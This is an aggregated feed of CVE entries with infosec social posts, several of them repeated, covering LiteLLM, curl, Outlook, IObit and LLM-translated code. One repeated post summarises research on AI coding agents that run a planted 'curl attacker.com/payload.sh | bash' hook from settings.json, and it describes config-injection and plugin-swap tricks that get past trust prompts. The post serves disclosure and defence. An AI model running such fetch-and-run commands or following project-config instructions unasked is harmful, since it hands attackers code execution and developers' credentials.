Upgradeability is very related to this. IMO, upgrading this “write only” reimplementation with new features beyond what’s in the upstream library is a bad idea. Development should continue on the original library that the original developers are familiar with. Then the translation could be fully regenerated on demand. This process exists already, but is obviously wasteful. I don’t personally see big issues with translating diffs instead, but it certainly could be that I’m missing something. After all, this whole thing is experimental!

Finally, sustainability is a tricky one. There are a lot of pieces to this: fair use of training data, energy, brainrot, economic shockwaves, etc. That’s all hard to pick apart. But dispatching agents can be the right _technical_ solution to many tasks, and I personally don’t feel that properly using them is antithetical to the research process (for example, it can lead to MUCH better implemented and more reliable experiment harnesses).

Thanks again for taking the time to write your thoughts down; looking forward to more discussion!

##

CVE-2025-68161(CVSS UNKNOWN)

EPSS: 0.03%

updated 2025-12-19T22:08:03

1 posts

The Socket Appender in Apache Log4j Core versions 2.0-beta9 through 2.25.2 does not perform TLS hostname verification of the peer certificate, even when the [verifyHostName](https://logging.apache.org/log4j/2.x/manual/appenders/network.html#SslConfiguration-attr-verifyHostName) configuration attribute or the [log4j2.sslVerifyHostName](https://logging.apache.org/log4j/2.x/manual/systemproperties

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2025-59250
(8.1 HIGH)

EPSS: 0.08%

updated 2025-11-24T17:38:57

1 posts

Improper input validation in JDBC Driver for SQL Server allows an unauthorized attacker to perform spoofing over a network.

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2025-48924
(6.5 MEDIUM)

EPSS: 0.04%

updated 2025-11-05T20:30:33

1 posts

Uncontrolled Recursion vulnerability in Apache Commons Lang. This issue affects Apache Commons Lang: Starting with commons-lang:commons-lang 2.0 to 2.6, and, from org.apache.commons:commons-lang3 3.0 before 3.18.0. The methods ClassUtils.getClass(...) can throw StackOverflowError on very long inputs. Because an Error is usually not handled by applications and libraries, a StackOverflowError coul

1 repos

https://github.com/njawalkar/apache-commons-lang2

AAKL@infosec.exchange at 2026-04-28T16:31:35.000Z ##

Cisco has a new advisory for two critical vulnerabilities:

- CVE-2026-20147and CVE-2026-20148: Cisco Identity Services Engine Remote Code Execution and Path Traversal Vulnerabilities sec.cloudapps.cisco.com/securi @TalosSecurity #Cisco

Broadcom:

High Severity: OM Spool Java Transformers vulnerabilities in OpenText Transformation Designer (OTD) - CVE-2026-5588, CVE-2025-59250, CVE-2025-12383, CVE-2025-48924, and CVE-2025-68161 support.broadcom.com/web/ecx/s #Broadcom

Tenable research advisories posted this yesterday:

Spring AI SQL Injection in PgVectorStore and friends tenable.com/security/research/ #infosec #vulnerability

##

CVE-2024-21413
(9.8 CRITICAL)

EPSS: 92.99%

updated 2025-10-22T00:33:00

1 posts

Microsoft Outlook Remote Code Execution Vulnerability

35 repos

https://github.com/MSeymenD/CVE-2024-21413

https://github.com/olebris/CVE-2024-21413

https://github.com/bhatbhupendra/Moniker-Link--CVE-2024-21413-

https://github.com/ahmetkarakayaoffical/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability

https://github.com/dionissh/CVE-2024-21413

https://github.com/TheMursalin/HTB-Mailing-A-Complete-Walkthrough

https://github.com/r00tb1t/CVE-2024-21413-POC

https://github.com/th3Hellion/CVE-2024-21413

https://github.com/duy-31/CVE-2024-21413

https://github.com/eylommaayan/THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

https://github.com/ArtemCyberLab/Project-NTLM-Hash-Capture-and-Phishing-Email-Exploitation-for-CVE-2024-21413

https://github.com/gurleen-147/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability-PoC

https://github.com/hau2212/Moniker-Link-CVE-2024-21413-

https://github.com/Mdusmandasthaheer/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability

https://github.com/PolarisXSec/CVE-2024-21413

https://github.com/yass2400012/Email-exploit-Moniker-Link-CVE-2024-21413-

https://github.com/E-m-e-k-a/Moniker-Link-Lab-Setup

https://github.com/ShubhamKanhere307/CVE-2024-21413

https://github.com/FathanahHidayati/https-github.com-xaitax-CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability

https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability

https://github.com/mmathivanan17/CVE-2024-21413

https://github.com/securenetexpert/CVE-2024-21413-Moniker-Link-Writeup

https://github.com/X-Projetion/CVE-2024-21413-Microsoft-Outlook-RCE-Exploit

https://github.com/Heera-V/CVE2024-21413

https://github.com/ViniciusFariasDev/cve-2024-21413-outlook-monikerlink-lab

https://github.com/Cyber-Trambon/CVE-2024-21413-exploit

https://github.com/CMNatic/CVE-2024-21413

https://github.com/pedro-lucas-melo/Estudo-de-Caso-CVE-2024-21413

https://github.com/ThemeHackers/CVE-2024-21413

https://github.com/KartheekKandalam99/SVPT_CW_2

https://github.com/D1se0/CVE-2024-21413-Vulnerabilidad-Outlook-LAB

https://github.com/dshabani96/CVE-2024-21413

https://github.com/MQKGitHub/Moniker-Link-CVE-2024-21413

https://github.com/Redfox-Security/Unveiling-Moniker-Link-CVE-2024-21413-Navigating-the-Latest-Cybersecurity-Landscape

https://github.com/SallocinAvalcante/lab-SMB-responder-CVE-2024-21413

thecybermind@infosec.exchange at 2026-04-28T09:23:39.000Z ##

CVE-2024-21413 (CVSS 9.8) is actively exploited and bypasses Outlook Protected View to enable remote code execution and NTLM hash theft. Here’s the enterprise risk breakdown, detection strategy, and mitigation roadmap security leaders need now.

thecybermind.co/2026/04/28/bri

##

CVE-2019-1367
(7.5 HIGH)

EPSS: 90.77%

updated 2025-10-22T00:32:47

2 posts

A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1221.

1 repos

https://github.com/mandarenmanman/CVE-2019-1367

CVE-2025-59536(CVSS UNKNOWN)

EPSS: 0.03%

updated 2025-10-03T14:16:36

1 posts

Due to a bug in the startup trust dialog implementation, Claude Code could be tricked to execute code contained in a project before the user accepted the startup trust dialog. Exploiting this requires a user to start Claude Code in an untrusted directory. Users on standard Claude Code auto-update will have received this fix automatically. Users performing manual updates are advised to update to

4 repos

https://github.com/DBarr3/AETHER-PROTOCOL-P

https://github.com/Rohitberiwala/Claude-Code-MCP-Injection-PoC

https://github.com/TreRB/ai-ide-config-guard

https://github.com/NetVanguard-cmd/CVE-2025-59536

hasamba@infosec.exchange at 2026-04-28T17:35:16.000Z ##

----------------

🎯 AI
===================

Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).

Technical details:

• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).

• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).

• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).

Analysis:

These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.

Detection:

• Monitor agent startup behaviors that access project settings or .env files.

• Alert on agent-initiated outbound connections immediately after project open events.

• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).

Mitigation:

• Enforce least-privilege for agent file and environment access.

• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.

• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.

References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136

🔹 AI #CVE-2025-59536 #CVE-2025-61260 #CVE-2025-54136

🔗 Source: geektime.co.il/ai-agent-config

##

CVE-2025-29787(CVSS UNKNOWN)

EPSS: 0.33%

updated 2025-03-19T15:51:05

1 posts

### Summary In the archive extraction routine of affected versions of the `zip` crate, symbolic links earlier in the archive are allowed to be used for later files in the archive without validation of the final canonicalized path, allowing maliciously crafted archives to overwrite arbitrary files in the file system when extracted. ### Details This is a variant of the [zip-slip](https://github.

Zardus@defcon.social at 2026-04-28T15:45:11.000Z ##

@addison Great points on maintainability, security, and sustainability! Here are my thoughts on this.

First, the security issues. These can come in two variants: an LLM introduces a bug into a library where no bug existed before, or an LLM faithfully translates buggy behavior from the original to the reimplemented library. IMO, the latter case is hard to fault the translator for and an argument can be made that, for “load bearing bugs”, the correct action here isn’t so clear. My gut feeling is that the right thing to do in this case is to fix the bug into the original and update/regenerate the translation.

The former case is by no means unique to LLMs. For example, (human-executed) rust reimplementations of archiving utilities have introduced Zip Slip vulnerabilities such as CVE-2025-29787 or CVE-2025-68705. We tend to hold coding agents to a significantly higher standard than humans here (which I think they eventually _will_ reach anyways), but I think the question of who introduces more bugs in reimplementations is far from a foregone conclusion already.

This brings us to maintainability. Again, there are two issues here: first, that no one knows the generated code and second, the question of updating it. I think that, regardless of our feelings about the matter, slopped code is here to stay. It’s already accounting for significant chunks of open source code out there (newsletter.semianalysis.com/p/), and as these agents continue to improve astronomically, this number will increase. We have, unfortunately, left the era of aggregations of developers knowing all of their code (although it can also be argued that this was never true in the first place, given maintainer drift and so on).

The fact that this code is truly “write only” in that no human reads it at all takes this a bit further for sure. I’m not sure what the eventual implications of this are (such as dpc.pw/posts/i-dont-want-your-), and it personally makes me sad, but I do think that code is somewhere on the path to becoming mostly an intermediate representation between specification and compilation. People used to write assembly, then in earlier days of compilers, they would sometimes hand-optimize compiler-produced assembly, but even this gradually stopped as compilers improved (e.g., the latest reference to this practice I can find is 2006 cs.fsu.edu/~whalley/papers/tec). We still learn assembly and the compilation process in Computer Organization in undergrad, and it’s important for some disciplines of Computer Science, but it’s definitely a somewhat niche topic. Source code seems to be on a similar trajectory.

Upgradeability is very related to this. IMO, upgrading this “write only” reimplementation with new features beyond what’s in the upstream library is a bad idea. Development should continue on the original library that the original developers are familiar with. Then the translation could be fully regenerated on demand. This process exists already, but is obviously wasteful. I don’t personally see big issues with translating diffs instead, but it certainly could be that I’m missing something. After all, this whole thing is experimental!

Finally, sustainability is a tricky one. There are a lot of pieces to this: fair use of training data, energy, brainrot, economic shockwaves, etc. That’s all hard to pick apart. But dispatching agents can be the right _technical_ solution to many tasks, and I personally don’t feel that properly using them is antithetical to the research process (for example, it can lead to MUCH better implemented and more reliable experiment harnesses).

Thanks again for taking the time to write your thoughts down; looking forward to more discussion!

##

CVE-2022-24138
(7.8 HIGH)

EPSS: 0.28%

updated 2023-01-27T05:05:44

1 posts

IOBit Advanced System Care (Asc.exe) 15 and Action Download Center both download components of IOBit suite into ProgramData folder, ProgramData folder has "rwx" permissions for unprivileged users. Low privilege users can use SetOpLock to wait for CreateProcess and switch the genuine component with a malicious executable thus gaining code execution as a high privilege user (Low Privilege -> high in

usernameone101@infosec.exchange at 2026-04-28T12:31:25.000Z ##

Just an update on the IObit Advanced SystemCare zero-day I posted about a couple days ago. I mentioned in that post VulDB marked it as a duplicate of CVE-2022-24138 and while I agree with the root cause analysis being the same (ProgramData permission issues) the actual exploit chain is quite different. I found a named pipe that lets a low-priv user trigger a SYSTEM integrity file write on-demand. Since IObit has a concrete history of not replying to researchers and history repeats, here is the full write-up:

github.com/usernameone101/Writ

#zeroday #infosec #cybersec #cybersecurity #bug #vulnerability

##

CVE-2025-6020
(0 None)

EPSS: 0.07%

1 posts

N/A

airtower@woem.men at 2026-04-29T17:44:52.465Z ##

@adulau@infosec.exchange @gcve@social.circl.lu For context: #Buildroot has tools to list known vulnerabilities for packages, currently based on NVD data (via https://github.com/fkie-cad/nvd-json-data-feeds).

I noticed it's missing a bunch of vulnerabilities (e.g. CVE-2026-40200, CVE-2026-6042 in musl libc) because the NVD data is missing CPE match information. At the time the CVEs were listed as "Awaiting Analysis", now "Deferred", so I assume it's not going to be added any time soon, if ever (generally the CPE match is present for vulnerabilities in "Analyzed" status). Looking at the GCVE listings was an attempt to find another, hopefully better, source, because an automated check that misses so many vulnerabilities is not going to be very useful.

Today
@Bubu@chaos.social pointed me at a similar example: CVE-2025-6020 (note the year), a "high" level vulnerability in linux-pam, which is also marked as "Deferred" in NVD. So we really could use a better source.

We'd need one we can download (rather than query individual packages one by one) without excessive load, but solving that is another matter, first we need a suitable source at all.

##

CVE-2026-25262
(0 None)

EPSS: 0.00%

2 posts

N/A

ari@doskel.net at 2026-04-29T17:11:40.000Z ##

ooo its vulnerable to CVE-2026-25262

##

ari@doskel.net at 2026-04-29T17:11:40.000Z ##

ooo its vulnerable to CVE-2026-25262

##

CVE-2026-42208
(0 None)

EPSS: 0.00%

4 posts

N/A

1 repos

https://github.com/imjdl/CVE-2026-42208_lab

beyondmachines1 at 2026-04-29T12:01:44.149Z ##

Critical SQL Injection Vulnerability in LiteLLM AI Gateway Exploited in the Wild

LiteLLM patched a critical pre-authentication SQL injection vulnerability (CVE-2026-42208) that allows attackers to steal cloud provider credentials and master API keys. The flaw was exploited in the wild within 36 hours of disclosure, targeting sensitive database tables used for AI gateway management.

**If you run LiteLLM, update to version 1.83.7 immediately to patch CVE-2026-42208, and isolate the proxy from the internet so it's only reachable from trusted networks. Assume any internet-exposed instance has been compromised - rotate all virtual API keys and provider credentials (OpenAI, Anthropic, AWS Bedrock) right away.**

beyondmachines.net/event_detai

##

beyondmachines1@infosec.exchange at 2026-04-29T12:01:44.000Z ##

Critical SQL Injection Vulnerability in LiteLLM AI Gateway Exploited in the Wild

LiteLLM patched a critical pre-authentication SQL injection vulnerability (CVE-2026-42208) that allows attackers to steal cloud provider credentials and master API keys. The flaw was exploited in the wild within 36 hours of disclosure, targeting sensitive database tables used for AI gateway management.

**If you run LiteLLM, update to version 1.83.7 immediately to patch CVE-2026-42208, and isolate the proxy from the internet so it's only reachable from trusted networks. Assume any internet-exposed instance has been compromised - rotate all virtual API keys and provider credentials (OpenAI, Anthropic, AWS Bedrock) right away.**
#cybersecurity #infosec #attack #activeexploit
beyondmachines.net/event_detai

##

LLMs@activitypub.awakari.com at 2026-04-29T08:54:39.000Z ## LiteLLM Proxy Gateway Under Active SQLi Exploitation Threat actors are exploiting CVE-2026-42208, a critical pre-authentication SQL injection flaw in LiteLLM, a widely-used open-source gateway for ...


Origin | Interest | Match ##

hackerworkspace@infosec.exchange at 2026-04-28T18:31:03.000Z ##

CVE-2026-42208: Targeted SQL injection against LiteLLM's authentication path discovered 36 hours following vulnerability disclosure | Sysdig

sysdig.com/blog/cve-2026-42208

Read on HackerWorkspace: hackerworkspace.com/article/cv

#authentication #aisecurity #vulnerability

##

CVE-2026-5545
(0 None)

EPSS: 0.00%

1 posts

N/A

bagder@mastodon.social at 2026-04-29T07:10:50.000Z ##

Out of the eight new #curl CVEs, four of them had existed in code for over twenty years when we published.

CVE-2026-5545 clocks in at 22.75 years old

CVE-2026-7168 at 21.91 years

CVE-2026-6429 at 20.95 years

CVE-2026-6253 at 20.66 years

And yet CVE-2026-5545 only becomes the 5th oldest vulnerability ever found in curl so far.

##

CVE-2026-6429
(0 None)

EPSS: 0.00%

1 posts

N/A

bagder@mastodon.social at 2026-04-29T07:10:50.000Z ##

Out of the eight new #curl CVEs, four of them had existed in code for over twenty years when we published.

CVE-2026-5545 clocks in at 22.75 years old

CVE-2026-7168 at 21.91 years

CVE-2026-6429 at 20.95 years

CVE-2026-6253 at 20.66 years

And yet CVE-2026-5545 only becomes the 5th oldest vulnerability ever found in curl so far.

##

CVE-2026-7168
(0 None)

EPSS: 0.00%

1 posts

N/A

bagder@mastodon.social at 2026-04-29T07:10:50.000Z ##

Out of the eight new #curl CVEs, four of them had existed in code for over twenty years when we published.

CVE-2026-5545 clocks in at 22.75 years old

CVE-2026-7168 at 21.91 years

CVE-2026-6429 at 20.95 years

CVE-2026-6253 at 20.66 years

And yet CVE-2026-5545 only becomes the 5th oldest vulnerability ever found in curl so far.

##

CVE-2026-6253
(0 None)

EPSS: 0.00%

1 posts

N/A

bagder@mastodon.social at 2026-04-29T07:10:50.000Z ##

Out of the eight new #curl CVEs, four of them had existed in code for over twenty years when we published.

CVE-2026-5545 clocks in at 22.75 years old

CVE-2026-7168 at 21.91 years

CVE-2026-6429 at 20.95 years

CVE-2026-6253 at 20.66 years

And yet CVE-2026-5545 only becomes the 5th oldest vulnerability ever found in curl so far.

##

CVE-2026-41649
(0 None)

EPSS: 0.03%

1 posts

N/A

thehackerwire@mastodon.social at 2026-04-28T22:30:23.000Z ##

🟠 CVE-2026-41649 - High (7.7)

Outline is a service that allows for collaborative documentation. The `shares.create` API endpoint starting in version 0.86.0 and prior to version 1.7.0 has an insecure direct object reference.. When both `collectionId` and `documentId` are provid...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-54136
(0 None)

EPSS: 0.11%

1 posts

N/A

1 repos

https://github.com/PRE5T0/CVE-2025-54136

hasamba@infosec.exchange at 2026-04-28T17:35:16.000Z ##

----------------

🎯 AI
===================

Executive summary: Check Point published detailed research demonstrating that popular AI development agents can interpret plain-text configuration files as executable instructions, enabling remote attackers to achieve code execution on developer machines and access cloud credentials. The report documents three distinct vulnerabilities in Claude Code, OpenAI Codex, and Cursor (CVE-2025-59536, CVE-2025-61260, CVE-2025-54136).

Technical details:

• Claude Code: the agent processes lifecycle hooks from a project settings.json and executes shell commands found in sessionStart. The published example shows curl -s attacker.com/payload.sh | bash embedded in settings.json, which the agent runs automatically when the project folder is opened (CVE-2025-59536).

• OpenAI Codex: a configuration-injection vector uses a project-local environment file (.env) to override runtime configuration via CODEX_HOME=./.codex, causing the agent to adopt attacker-controlled project-level settings and direct activity to attacker C2 infrastructure (CVE-2025-61260).

• Cursor: the plugin trust model relies on plugin name rather than content authenticity. An attacker can submit a benign-named plugin (e.g., linter-pro), obtain a one-time approval, then update the plugin source in the repository to include destructive actions. Subsequent Git sync operations execute the updated payload without reauthorization (CVE-2025-54136).

Analysis:

These issues reflect an architectural blind spot: AI agents treat configuration and metadata as operational code. Where developers historically distrust binaries and scripts, they often implicitly trust plain-text configs. When agents are granted broad file and environment access, that trust boundary is exploitable.

Detection:

• Monitor agent startup behaviors that access project settings or .env files.

• Alert on agent-initiated outbound connections immediately after project open events.

• Track changes to approved plugin identifiers versus actual repository contents (file diffs post-approval).

Mitigation:

• Enforce least-privilege for agent file and environment access.

• Isolate agent execution in strictly controlled sandboxes or ephemeral VMs.

• Separate production API keys and secrets from developer workspaces and block agent access to sensitive env files.

References: CVE-2025-59536, CVE-2025-61260, CVE-2025-54136

🔹 AI #CVE-2025-59536 #CVE-2025-61260 #CVE-2025-54136

🔗 Source: geektime.co.il/ai-agent-config

##

CVE-2026-35177
(0 None)

EPSS: 0.01%

1 posts

N/A

linux@activitypub.awakari.com at 2026-04-28T00:19:14.000Z ## Ubuntu 25.10 Vim Critical Code Exec Risk USN-8213-1 CVE-2026-35177 Several security issues were fixed in Vim.

#Ubuntu #Linux #Distribution #- #Security #Advisories

Origin | Interest | Match ##

Visit counter For Websites